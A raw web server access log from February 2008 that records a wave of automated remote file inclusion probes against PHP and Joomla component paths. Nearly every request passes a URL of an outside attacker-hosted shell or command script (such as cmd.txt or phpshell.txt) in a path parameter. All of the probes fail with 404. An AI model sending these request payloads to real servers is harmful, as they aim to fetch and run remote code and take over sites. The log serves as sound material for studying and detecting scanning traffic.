77.232.66.107 - - [14/Feb/2008:10:20:56 -0800] "GET /logs/access_071225.log//modules/class/Table.php?sys_conf[path][real]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:20:57 -0800] "GET //modules/class/Table.php?sys_conf[path][real]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:20:57 -0800] "GET /logs//modules/class/Table.php?sys_conf[path][real]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:10:21:16 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:10:21:31 -0800] "GET /logs/access_080201.log//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:10:21:32 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:10:21:33 -0800] "GET /errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
87.118.104.114 - - [14/Feb/2008:10:22:27 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
208.226.79.133 - - [14/Feb/2008:10:22:30 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.104.114 - - [14/Feb/2008:10:22:31 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.58.140.237 - - [14/Feb/2008:10:22:38 -0800] "GET /logs/access_080201.log//includes/orderSuccess.inc.php?dir=http://www.advtekgroup.com.cn/bbs/images/avatars/21.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [14/Feb/2008:10:22:38 -0800] "GET //includes/orderSuccess.inc.php?dir=http://www.advtekgroup.com.cn/bbs/images/avatars/21.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [14/Feb/2008:10:22:38 -0800] "GET /logs//includes/orderSuccess.inc.php?dir=http://www.advtekgroup.com.cn/bbs/images/avatars/21.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [14/Feb/2008:10:22:45 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:10:23:15 -0800] "GET /logs/access_080117.log//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:10:23:15 -0800] "GET //mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:10:23:16 -0800] "GET /logs//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:10:23:29 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:10:23:29 -0800] "GET /logs/access_080120.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:10:23:30 -0800] "GET /config.php?path_to_root=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:10:23:30 -0800] "GET /errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:10:23:31 -0800] "GET /logs/config.php?path_to_root=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:10:23:31 -0800] "GET /logs/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:10:23:45 -0800] "GET /logs/access_080201.log//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.84.2 - - [14/Feb/2008:10:24:01 -0800] "GET /logs/access_080201.log/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [14/Feb/2008:10:24:01 -0800] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [14/Feb/2008:10:24:01 -0800] "GET /logs/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:10:24:02 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:10:24:02 -0800] "GET /logs/access_080108.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
208.77.102.172 - - [14/Feb/2008:10:24:08 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [14/Feb/2008:10:24:09 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [14/Feb/2008:10:24:09 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.24.226 - - [14/Feb/2008:10:24:48 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [14/Feb/2008:10:24:48 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [14/Feb/2008:10:24:48 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:25:14 -0800] "GET /logs/access_080201.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:25:15 -0800] "GET //components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:25:15 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:10:25:28 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.216 - - [14/Feb/2008:10:25:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.143 - - [14/Feb/2008:10:25:29 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:25:58 -0800] "GET /logs/access_080106.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:25:59 -0800] "GET //components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:25:59 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:26:04 -0800] "GET /logs/access_080131.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:26:05 -0800] "GET /logs/access_080201.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:09 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:09 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:10 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:10 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:11 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:16 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:16 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:16 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:16 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:17 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:26:17 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.77.102.172 - - [14/Feb/2008:10:27:16 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:10:28:33 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://brasirc.t35.com/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:29:33 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:30:11 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:30:11 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:30:11 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:30:11 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:30:11 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:30:11 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.178.201 - - [14/Feb/2008:10:30:43 -0800] "GET //update/update5.php?lang=http://www.vuls2008.kit.net/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
84.19.178.201 - - [14/Feb/2008:10:30:44 -0800] "GET /logs//update/update5.php?lang=http://www.vuls2008.kit.net/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:30:53 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:30:54 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:30:58 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:32:19 -0800] "GET /logs/access_071225.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:32:19 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:32:20 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:10:32:24 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:10:32:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:10:32:26 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:32:32 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:32:33 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:32:33 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:32:35 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:32:35 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:32:35 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:32:35 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:32:35 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:32:35 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:32:37 -0800] "GET /logs/access_071220.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:33:07 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:33:14 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:33:14 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:33:14 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:33:14 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:33:14 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:33:14 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.152.41.4 - - [14/Feb/2008:10:33:21 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:33:27 -0800] "GET /logs/access_071220.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:33:28 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:33:29 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:33:39 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:34:18 -0800] "GET /logs/access_080117.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:34:21 -0800] "GET /logs/access_080117.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.251.172.41 - - [14/Feb/2008:10:34:25 -0800] "GET /logs/access_080201.log//includes/orderSuccess.inc.php?include($glob['rootDir']=http://www.mta.cl/galeria2/galery.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.251.172.41 - - [14/Feb/2008:10:34:25 -0800] "GET /logs//includes/orderSuccess.inc.php?include($glob['rootDir']=http://www.mta.cl/galeria2/galery.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.53.83.254 - - [14/Feb/2008:10:34:56 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
84.53.83.254 - - [14/Feb/2008:10:34:57 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:35:13 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:35:22 -0800] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:35:22 -0800] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:35:23 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:35:34 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:35:34 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
